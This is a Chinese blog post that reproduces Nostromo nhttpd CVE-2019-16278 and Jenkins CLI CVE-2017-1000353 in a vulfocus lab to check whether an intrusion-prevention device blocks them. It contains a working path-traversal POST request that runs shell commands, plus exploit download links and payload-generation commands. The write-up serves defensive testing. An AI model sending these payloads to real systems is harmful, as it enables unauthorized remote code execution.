入侵防御漏洞复现(二)

已于 2024-01-18 13:53:57 修改
阅读量405 收藏 11
点赞数 9
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络
于 2024-01-16 18:21:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/szdx1043/article/details/135631624
版权

一、CVE-2019-16278 Nostromo nhttpd http_verify目录遍历漏洞——访问控制

1.简介

Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。

2.vulfocus搭建靶场

3.攻击源使用burpsuite发送攻击报文

注意目的ip和目的端口

POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
Host: 192.168.20.240:63961
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Connection: close
Content-Length: 27

echo
echo
ifconfig 2>&1

4.攻击成功

远程执行Nostromo 容器内命令成功,获取对应信息

5. 测试DUT防护

DUT开启漏洞检测防御后,发送报文无法获取response,DUT产生漏洞防御日志

二、CVE-2017-1000353 WEB_SPECIFIC_APPS Jenkins CLI远程代码执行漏洞——漏洞攻击、访问控制

1.简介

CloudBees Jenkins是美国CloudBees公司的一款基于Java开发的开源的、可持续集成的自动化服务器,它主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。LTS(Long-Term Support)是CloudBees Jenkins的一个长期支持版本。CloudBees Jenkins 2.56及之前的版本和2.46.1 LTS及之前的版本中存在远程代码执行漏洞。远程攻击者可通过向Jenkins CLI传递序列化的Java ‘SignedObject’对象利用该漏洞绕过基于黑名单的保护机制。、

2. vulfocus 搭建靶场

3. 攻击步骤

1)两个基础文件


CVE-2017-1000353-1.1-SNAPSHOT-all.jar
exploit.py

下载路径https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar

https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py

2)构造攻击ser

使用kali linux系统,java命令生成jenkins_poc.ser 文件

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

然后使用python3 向靶机发送文件

python3 exploit.py http://192.168.20.240:31184 jenkins_poc.ser

python3 exploit.py http://192.168.20.240:31184 jenkins_poc.ser

3)遇到的问题

a. java生成jenkins_poc.ser 文件失败

报错 module java.base does not "opens java.util" to unnamed module @5a9ae579,  搜了一下是因为默认jdk版本17太高,先尝试增加jvm启动参数,发现添加失败,没找到正确的添加方式

后续降低jdk版本解决,linux可以多jdk版本共存,切换到jdk  1.8.0_291版本后,生成攻击文件成功

参考链接

[环境搭建] Kali 下多版本JDK 共存 - 2022 年11 月1 日更新 - 知乎

b.python3 运行exploit.py报错

报错信息:No connection adapters were found for {url!r}

问题原因:发送的python3语句中的url缺少" http:// "前缀

正确命令是 python3 exploit.py http://192.168.20.240:31184 jenkins_poc.ser

┌──(root㉿kali)-[/home/zyyuan]
└─# python exploit.py 192.168.20.240:41458 jenkins_poc.ser
start
Exception in thread Thread-1 (download):
Traceback (most recent call last):
  File "/usr/lib/python3.11/threading.py", line 1045, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.11/threading.py", line 982, in run
    self._target(*self._args, **self._kwargs)
  File "/home/zyyuan/exploit.py", line 30, in download
    r = requests.post(url, data=null_payload(), headers=headers, proxies=proxies, stream=True, verify=False)
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/requests/api.py", line 115, in post
    return request("post", url, data=data, json=json, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/requests/api.py", line 59, in request
    return session.request(method=method, url=url, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/requests/sessions.py", line 589, in request
    resp = self.send(prep, **send_kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/requests/sessions.py", line 697, in send
    adapter = self.get_adapter(url=request.url)
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/requests/sessions.py", line 794, in get_adapter
    raise InvalidSchema(f"No connection adapters were found for {url!r}")
requests.exceptions.InvalidSchema: No connection adapters were found for '192.168.20.240:41458/cli'
pwn
Traceback (most recent call last):
  File "/home/zyyuan/exploit.py", line 83, in <module>
    main()
  File "/home/zyyuan/exploit.py", line 80, in main
    upload_chunked(URL, session, "asdf")
  File "/home/zyyuan/exploit.py", line 52, in upload_chunked
    r = requests.post(url, headers=headers, data=create_payload_chunked(), proxies=proxies, verify=False)
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/requests/api.py", line 115, in post
    return request("post", url, data=data, json=json, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/requests/api.py", line 59, in request
    return session.request(method=method, url=url, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/requests/sessions.py", line 589, in request
    resp = self.send(prep, **send_kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/requests/sessions.py", line 697, in send
    adapter = self.get_adapter(url=request.url)
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/requests/sessions.py", line 794, in get_adapter
    raise InvalidSchema(f"No connection adapters were found for {url!r}")
requests.exceptions.InvalidSchema: No connection adapters were found for '192.168.20.240:41458/cli'

4.攻击成功

攻击成功后,到靶机上查看,在/tmp下自动创建一个success文件

5.测试DUT防护

开启DUT防护后,python3发送文件失败,链接被重置,DUT报警日志

szdx1043
关注
  • 9
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2019-16278:Nostromo Web服务器的远程命令执行
NOSEC2019的博客
10-22 2597
在这篇文章中,我将分析CVE-2019-16278漏洞的成因,以及如何去利用它。这个漏洞存在于Nostromo web服务上(又名nhttpd),这是一个开源的web服务,在Unix系统上非常流行,例如FreeBSD, OpenBSD等等。 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/...
CVE-2019-16278-Nostromo Web Server远程代码执行
17bdw的编程备份笔记
12-17 162
本文主题主要是分析CVE-2019-16278漏洞原因、漏洞如何利用以及为什么会受到攻击。这个CVE跟Nostromo Web服务器(又名nhttpd)有关,这个组件是在FreeBSD,OpenBSD等Unix系统上非常流行的开源Web服务器。 Nostromo无法验证URL,导致可以通过路径遍历系统中的任何文件。没有通过身份验证的攻击者可以强制服务器指向/bin/sh之类的shell文件并执行...
(环境搭建+)CVE-2019-16278 Nostromo Web服务器的远程命令执行
daxi0ng的博客
03-13 1691
【CNVD编号】 CVE-2019-16278 【漏洞名称】 Nostromo Web服务器的远程命令执行 1【靶标分类】 web中间件漏洞 2【漏洞分类】 命令执行 3【漏洞等级】 高 4【漏洞简介】 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的...
Vulfocus练习之Nostromo nhttpd远程命令执行(CVE-2019-16278)
weixin_45701865的博客
12-12 824
nostromo远程命令执行(CVE-2019-16278)
nostromo 远程命令执行 (CVE-2019-16278)
顺其自然~专栏
10-30 160
Nostromo nhttpd是一款开源的Web服务器。Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。然后尝试读取flag,经过测试flag位于/tmp目录下,因无法形成命令交互,所以使用管道符 最终的payload为cd /tmp && ls。发存在cve-2019-16278。升级至最新版本1.9.7。
漏洞----2、Nostromo Web服务器远程命令执行(CVE-2019-16278)
七天
12-02 2206
文章目录一、漏洞背景二、漏洞原理三、漏洞 一、漏洞背景 Nostromo web(又名nhttpd),这是一个开源的web服务,在Unix系统上非常流行,例如FreeBSD, OpenBSD等。 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。 在CVE-2011-0751中攻击者可以通过/..%2f..%2f..%2fbin/sh来实路径穿越,而
飞秋漏洞工具
07-09
5. **防御策略**:根据发漏洞,提出防御建议,例如更新到最新版本的飞秋、使用防火墙阻止恶意流量、部署入侵检测系统等。 6. **教育和培训**:向用户和管理员普及网络安全知识,提高他们识别和防范网络攻击的...
dzexp利用工具 dz7.1 dz7.2 0day漏洞利用
01-28
这暗示了这个工具可能是黑客或安全研究人员用来测试系统安全性的,或者是教育目的,以便于了解漏洞的工作原理和防御措施。 【标签解析】 标签“dz漏洞”、“dz7.1”、“dz7.2”进一步明确了讨论的主题,即与Discuz!...
WX 0day上线CS.rar
04-21
3、**对应版本wx安装包**:这可能是一个含有特定漏洞的WX软件版本,攻击者可能利用这个版本中的0day漏洞入侵系统。安全研究人员可以使用这个版本来重攻击场景,以验证漏洞的存在并开发防御策略。 【标签】"wx 0...
CVE-2022-28525文档(巨详细,零基础
10-14
七、漏洞防御 为了防御 CVE-2022-28525 漏洞,服务器管理员应该采取以下措施: * 及时更新服务器软件和组件 * 正确地验证用户输入 * 限制上传文件的类型和大小 * 使用防火墙和入侵检测系统 本文档详细介绍了 CVE-...
Nostromo 远程命令执行(CVE-2019-16278)
小小猪的博客
12-25 765
Nostromo 远程命令执行(CVE-2019-16278) 框架介绍: Nostromo web server(nhttpd)是一个开源的web服务器,在Unix系统非常流行。 影响版本: nhttpd:version <= 1.9.6 环境搭建: 这里采用在线环境 地址 漏洞: 访问首页 burp抓包,构造注入命令 POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0 Host: vulfocus.fofa.so:34
Nostromo 1.9.6 远程代码执行漏洞(CVE-2019-16278)
孤桜懶契
03-28 1173
漏洞描述 用于利用 Nostromo nhttpd 中函数 http_verify 中的目录遍历漏洞利用 CVE-2019-16278 (Nostromo 1.9.6),该漏洞通过精心设计的 HTTP 请求导致未经身份验证的 RCE。仅将 Web 服务器的主机和端口作为必需参数。 漏洞影响 s ✅Nostromo 1.9.6 空间测绘 d ⭕hunter:web.similar_id="4fe4d6adce727c111450c2be583537b6"&&header.server==
Nostromo远程命令执行(CVE-2019-16278)
最新发布
m0_65150886的博客
02-26 393
在nhttpd <= 1.9.6版本中,Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。Nostromo web server(nhttpd)是一个开源的web服务器,在Unix系统非常流行。1.访问http://ip:port,出如下页面,开始实验。3.将数据包发送给重发器,并修改get请求。2.通过burp进行抓包。
Goby 漏洞更新 | Nostromo nhttpd远程代码执行漏洞(CVE-2019-16278)
m0_46699477的博客
04-21 197
CVE-2019-16278 nostromo nhttpd 是一款开源的 Web 服务器。 nostromo nhttpd 1.9.6 及之前版本中的 `http_verify` 函数存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。
nostromo 远程命令执行 (CVE-2019-16278)漏洞
weixin_42675091的博客
09-23 999
nostromo 远程命令执行 (CVE-2019-16278)漏洞
c++ 结构体遍历_利用目录遍历漏洞RCE(CVE201916278漏洞分析,附GDB调试过程)
weixin_39826984的博客
11-26 243
0x00 前言前几天有大佬放出了CVE-2019-16278和CVE-2019-16279的payload,16278可以利用跨目录遍历漏洞造成RCE(Remote Command Execute),16279可以实DOS攻击。漏洞影响Nostromo webserver 1.9.6及以下所有版本,因为这是一个小众Web服务器,网络上的资料较少,笔者在搭建环境的过程中踩了不少坑,导致分...
Nostromo nhttpd系列漏洞利用以及总结
jammny
10-23 1632
前言: Nostromonhttpd是一款简单快速的开源Web服务器,在Unix系统非常流行。 Nostromo 目录遍历(CVE-2011-0751) 漏洞详情: 1.9.4之前版本中存在目录遍历漏洞。远程攻击者可以借助URI中的“..%2f”执行任意程序或者读取任意文件。 影响版本: versions <= 1.9.4 POC: #!/bin/sh if [ $# -lt 3 ]; then echo "Usage: $(basename $0) HOST P..
Nostromo Web服务器的远程命令执行 CVE-2019-16278 已亲自
qq_42430287的博客
12-19 584
Nostromo Web服务器的远程命令执行 CVE-2019-16278 已亲自
freebsd查看服务_CVE-2019-16278:Nostromo Web服务器的远程命令执行
weixin_39763033的博客
12-09 184
在这篇文章中,我将分析CVE-2019-16278漏洞的成因,以及如何去利用它。这个漏洞存在于Nostromo web服务上(又名nhttpd),这是一个开源的web服务,在Unix系统上非常流行,例如FreeBSD, OpenBSD等等。Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值